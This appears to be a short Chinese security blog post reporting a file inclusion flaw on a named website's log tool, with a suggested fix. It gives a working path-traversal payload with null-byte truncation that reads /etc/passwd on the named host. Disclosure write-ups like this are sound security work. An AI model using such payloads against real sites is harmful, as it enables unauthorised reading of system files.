91某业务站点存在文件包含及修复 – 网站安全

存在文件包含的站点：

http://diy.91.com

对http://diy.91.com/login.php 测试，无果。

通过目录遍历得到：

diy.91.com/tools/log/

post:logtype=../../../../../../../../../../etc/passwd%00.jpg

91某业务站点存在文件包含及修复 – 网站安全 –插图

91某业务站点存在文件包含及修复 – 网站安全 –插图1

修复方案：

logtype参数进行限制，猜测应该是

include $_POST[logtype].".php" ..php被%00截断了。。你们的php版本较低。。可以的话做下升级吧。

本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了，原文地址《91某业务站点存在文件包含及修复 – 网站安全 –》